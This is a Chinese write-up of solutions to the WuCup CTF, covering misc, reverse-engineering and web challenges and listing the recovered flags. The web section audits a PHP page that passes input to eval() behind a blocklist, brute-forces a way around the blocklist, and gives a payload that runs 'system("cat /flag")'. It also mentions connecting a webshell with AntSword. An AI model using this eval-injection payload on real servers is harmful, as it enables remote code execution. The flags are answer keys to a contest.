吾杯网络安全竞赛

misc

Sign

随波逐流一把梭，base16解密

WuCup{df357d47-31cb-42a8-aa0c-6430634ddf4a}

原神启动！

stegsolve查看通道，在red plane里发现密码：WuCup{7c16e21c-31c2-439e-a814-bba2ca54101a}

word改后缀为zip,在word/media里找到图片

放大看，图片很模糊，但是也看得出为：WuCup{6bb9d97d-7169-434b-a7cf-0ee0b6fdfa30}

这是img的密码，test里的密码在document.xml里，密码为WuCup{f848566c-3fb6-4bfd-805a-d9e102511784}

WuCup{0e49b776-b732-4242-b91c-8c513a1f12ce}

太极

题目：

太极生两仪-两仪生四象-四象生八卦-八卦定吉凶-吉凶生大业

根据提示：tai ji sheng liang yi 分别取1 2 3 4 5的字母，即t i e n y

liang yi sheng si xiang 同理可得是l i e i g

si xiang sheng ba gua 即是s i e a u

推理的接下来2个是bunig jieay

flag是：WuCup{tieny-lieig-sieau-bunig-jieay}

re

If you know

查壳有upx壳

.\upx -d miss 脱壳

然后ida分析程序

Fcn1和fcn2函数里就是简单的加减异或运算，逆回去就好,密文通过动调得到

def decrypt_fcn(a1, a2, length, is_even):
    for i in range(length):
        a1[i] = (a1[i] - i - a2) ^ i


def decrypt_flag(encrypted_data):
    length = len(encrypted_data)
    decrypted_data = encrypted_data[:]

    # Reverse the encryption process
    for j in range(length - 1, -1, -1):
        decrypt_fcn(decrypted_data, j + (2 if j & 1 else 1), length, j & 1)

    # Validate and convert to characters
    try:
        return ''.join(chr(value) if 0 <= value <= 255 else '?' for value in decrypted_data)
    except ValueError as e:
        raise ValueError(f"Invalid decrypted value: {e}")


if __name__ == "__main__":
    # Example encrypted data (replace with actual values)
    encrypted_data = [
        245, 512, 520, 495, 565, 628, 570, 630, 695, 774, 690, 787, 738, 815, 881, 1088, 824, 1001, 994, 950, 1031,
        1086, 954, 1012, 1045, 1139, 1242
    ]  # Replace this with actual encrypted array

    try:
        # Perform decryption
        decrypted_flag = decrypt_flag(encrypted_data)
        print("Decrypted Flag:", decrypted_flag)
    except ValueError as e:
        print("Error during decryption:", e)
  #Decrypted Flag: ?_10v3_y0u_d34r_1f_y0u_kn0w  这里猜测是1

WuCup{1_10v3_y0u_d34r_1f_y0u_kn0w}

web

sign

web签到即可，蚁剑连接，直接出flag

HelloHacker

代码审计

<?php
highlight_file(__FILE__);
error_reporting(0);
include_once 'check.php';
include_once 'ban.php';

$incompetent = $_POST['incompetent'];
$WuCup = $_POST['WuCup'];

if ($incompetent !== 'HelloHacker') {
    die('Come invade!');
}

$required_chars = ['p', 'e', 'v', 'a', 'n', 'x', 'r', 'o', 'z'];
$is_valid = true;

if (!checkRequiredChars($WuCup, $required_chars)) {
    $is_valid = false;
}

if ($is_valid) {

    $prohibited_file = 'prohibited.txt';
    if (file_exists($prohibited_file)) {
        $file = fopen($prohibited_file, 'r');
        
while ($line = fgets($file)) {
    $line = rtrim($line, "\r\n");  
    if ($line === '' && strpos($WuCup, ' ') === false) {
      
        continue;
    }
    if (stripos($WuCup, $line) !== false) {
        fclose($file);  
        die('this road is blocked');
    }
}

        
        fclose($file);  
    }

    eval($WuCup);
} else {
    die('NO！NO！NO！');
}

?>
Come invade!

下载prohibited.txt，看看哪些字符被禁用了，定义一个数组且必须在WuCup里包含有这几个字符[‘p’, ‘e’, ‘v’, ‘a’, ‘n’, ‘x’, ‘r’, ‘o’, ‘z’];

这里用爆破来找出prohibited.txt里不存在的字符

import itertools

whereisi = __file__[:__file__.rfind('\\')+1]  #获取当前文件所在的文件路径

string = "erozxapvn"

with open(whereisi + 'prohibited.txt', 'r') as f:

    lines = f.readlines()
    lines = [i.strip() for i in lines]    #去除字符串的首尾空格和换行符
    for i in itertools.permutations(string,len(string)):
        i = "".join(i)
        if i not in lines:
            print(i)
            break

构造payload

?incompetent=HelloHacker &WuCup=eval($_POST[0]);#oxzverapn &0=system(“cat /flag”);